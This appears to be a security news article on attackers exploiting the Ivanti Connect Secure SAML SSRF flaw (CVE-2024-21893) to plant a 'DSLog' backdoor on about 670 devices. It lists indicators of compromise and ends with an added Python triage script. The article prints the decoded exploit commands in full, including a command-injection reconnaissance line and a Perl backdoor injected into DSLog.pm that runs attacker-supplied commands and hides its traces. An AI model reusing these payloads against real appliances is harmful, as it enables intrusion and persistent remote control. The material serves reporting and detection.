Hackers Inject DSLog Malware into 670 Devices Using Ivanti SSRF Flaw Exploit
Ivanti Connect Secure was previously found to have yet another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned CVE-2024-21893 with a severity of 8.2 (High).
Moreover, this vulnerability was previously reported to be exploited by threat actors in the wild at the time of disclosure. However, recent reports state that threat actors have leveraged this vulnerability to install a previously unknown "DSLog backdoor" on vulnerable devices.
Orange Cyberdefense detected 670 compromised assets into which attackers had injected the backdoor using the SAML vulnerability. This provided the attacker with persistent remote access.
Hackers Exploiting Ivanti SSRF Flaw
According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices, which threat actors exploit by injecting a backdoor through command injection. The backdoor is accessed and controlled with a simple "API key" mechanism.
Initial Request
During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request containing an encoded command in the "RetrievalMethod URI." The request was identified as a URL-encoded request carrying a base64-encoded command alongside the URI.
URL-decoding and then base64-decoding the request yields the following command line used by the threat actors for exploitation.
http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname -a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash; |
This command gathers internal reconnaissance information and stores it in a file named "index2.txt" using the 'echo' command-line tool. The encoded strings are decoded with the base64 decode utility and executed by the bash command interpreter.
Backdoor Installation
Once the above command executes successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same technique of URL- and base64-encoding the instructions. The request is as follows:
http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw / DESTFILE="/home/perl/DSLog.pm" CLFILE="/home/perl/DSLogMB.pm" if cat $DESTFILE | grep -q 'HTTP_USER_AGENT'; then echo 'OK'; else sed -i '102i\ my $ua = $ENV{HTTP_USER_AGENT};\n my $req = $ENV{QUERY_STRING};\n my $qur = "da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7";\n my @param = split(/&/, $req);\n if (index($ua, $qur) != -1) {\n if ($param[1]){\n my @res = split(/=/, $param[1]);\n if ($res[0] eq "cdi"){\n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;\n $res[1] =~ tr/!-~/P-~!-O/;\n system(${res[1]});\n }\n }\n }' $DESTFILE fi /bin/touch -r $CLFILE $DESTFILE rm -rf /var/cores/* /home/venv3/bin/python3 -c 'import DSMonitor;DSMonitor.warmRestart()'| /usr/bin/base64 -d | /bin/bash; |
This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named "DSLog.pm". DSLog is the module responsible for logging authenticated web requests and system logs on the device.
Orange Cyberdefense provides a complete breakdown of the backdoor, command execution, methodologies, and other technical details for readers with a strong technical background.
Indicators of Compromise
Host-based IoC
Path + filename | Hash | Description |
/root/home/perl/DSLog[.]pm | N/A – varies | Legitimate DSLog log module embedding the backdoor |
/root/home/webserver/htdocs/dana-na/imgs/index[.]txt | N/A – varies | |
/root/home/webserver/htdocs/dana-na/imgs/index1[.]txt | N/A – varies | Some appear to be random characters. |
/root/home/webserver/htdocs/dana-na/imgs/index2[.]txt | N/A – varies | Some appear to be random characters. |
/root/home/webserver/htdocs/dana-na/imgs/mark[.]png | | Embedding the result of 'uname -a' |
Network-based IoC
Network Indicator | Type | Description |
159.65.123.122 | IP address | Mass exploitation activity |
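The indicators above and the injected Perl handler shown earlier translate directly into a triage check. The following script is an added example, not code from the article or from Orange Cyberdefense. It assumes an Apache/NGINX "combined" access-log format for the sample lines, uses constructed request paths and timestamps, and replaces the real API-key token with a placeholder of 64 zeros. One assumption is drawn from the installation command itself: the attackers only skip the sed injection when DSLog.pm already contains HTTP_USER_AGENT, so a clean copy of the module is taken not to reference that variable, which makes it a usable marker. Hashes are listed as "varies", so the dropped files are matched by path only.

```python
"""Triage helper for the DSLog backdoor indicators listed above.

Added example; not code from the article or from Orange Cyberdefense.
It checks (1) a DSLog.pm body for fragments of the injected Perl handler,
(2) an appliance file listing for the dropped files in the host-based IoC
table, and (3) access-log lines for the listed exploitation IP and for the
request shape the backdoor answers to (64-hex token in the User-Agent plus
a 'cdi=' query parameter). All sample data below is constructed.
"""
from __future__ import annotations
import re
from urllib.parse import unquote

# Host-based indicators from the article (dropped files; hashes vary).
DROPPED_FILES = {
    "/home/webserver/htdocs/dana-na/imgs/index.txt",
    "/home/webserver/htdocs/dana-na/imgs/index1.txt",
    "/home/webserver/htdocs/dana-na/imgs/index2.txt",
    "/home/webserver/htdocs/dana-na/imgs/mark.png",
}
# Network-based indicator from the article.
KNOWN_BAD_IPS = {"159.65.123.122"}

# Fragments of the injected Perl from the installation command. The installer
# skips injection when HTTP_USER_AGENT is already present, so (assumption) a
# clean DSLog.pm does not reference it.
BACKDOOR_MARKERS = (
    "$ENV{HTTP_USER_AGENT}",
    "$ENV{QUERY_STRING}",
    'eq "cdi"',
    "chr(hex($1))",
    "tr/!-~/P-~!-O/",
)
# The backdoor's API key is a 64-character hex string looked up in the UA.
HEX64 = re.compile(r"[0-9a-fA-F]{64}")
# Apache/NGINX "combined" access-log format (assumed for the samples).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
    r' [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def dslog_markers(perl_source: str) -> list[str]:
    """Return the backdoor markers found in a DSLog.pm body (empty if clean)."""
    return [m for m in BACKDOOR_MARKERS if m in perl_source]


def dropped_files_present(paths) -> list[str]:
    """Intersect an appliance file listing with the dropped-file IoCs."""
    return sorted(set(paths) & DROPPED_FILES)


def triage_log_line(line: str) -> list[str]:
    """Return the reasons a single access-log line is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["line does not match the expected log format"]
    reasons = []
    if m["ip"] in KNOWN_BAD_IPS:
        reasons.append("source IP listed as a mass-exploitation address")
    target = unquote(m["target"])
    query = target.partition("?")[2]
    # The handler only fires when the token is in the UA and 'cdi' is a
    # query parameter, so require both to keep false positives down.
    if HEX64.search(m["ua"]) and "cdi=" in query:
        reasons.append("backdoor call shape: 64-hex token in User-Agent with cdi= parameter")
    if "127.0.0.1:8090/api/v1/license/keys-status" in target:
        reasons.append("SSRF target from the exploit chain present in request")
    return reasons


def triage_log(lines) -> list[tuple[str, list[str]]]:
    """Return (source IP, reasons) for every flagged line."""
    flagged = []
    for line in lines:
        reasons = triage_log_line(line)
        if reasons:
            m = LOG_RE.match(line)
            flagged.append((m["ip"] if m else "?", reasons))
    return flagged


# --- constructed sample data ---------------------------------------------
CLEAN_DSLOG = "package DSLog;\nsub log_request { my ($msg) = @_; print STDERR $msg; }\n1;\n"
# Handler rebuilt from the article's sed payload, token replaced by a placeholder.
INFECTED_DSLOG = CLEAN_DSLOG + (
    "my $ua = $ENV{HTTP_USER_AGENT};\nmy $req = $ENV{QUERY_STRING};\n"
    'my $qur = "' + "0" * 64 + '";\nmy @param = split(/&/, $req);\n'
    'if ($res[0] eq "cdi"){ $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg; }\n'
)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:09:00:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '159.65.123.122 - - [01/Jan/2024:09:01:00 +0000] "POST /dana-na/auth/saml-sso.cgi HTTP/1.1" 302 0 "-" "python-requests/2.31"',
    '203.0.113.7 - - [01/Jan/2024:09:02:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi?a=1&cdi=4142 HTTP/1.1" 200 128 "-" '
    '"Mozilla/5.0 0000000000000000000000000000000000000000000000000000000000000000"',
]

if __name__ == "__main__":
    print("DSLog.pm markers:", dslog_markers(INFECTED_DSLOG))
    for ip, reasons in triage_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

Run against a real appliance, feed `dslog_markers` the contents of /home/perl/DSLog.pm, `dropped_files_present` a recursive listing of /home/webserver/htdocs/dana-na/imgs, and `triage_log` the web access log; a hit on the marker check is the strongest signal, since the IoC table notes the module's hash varies per host and cannot be matched directly.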
Source credit : cybersecuritynews.com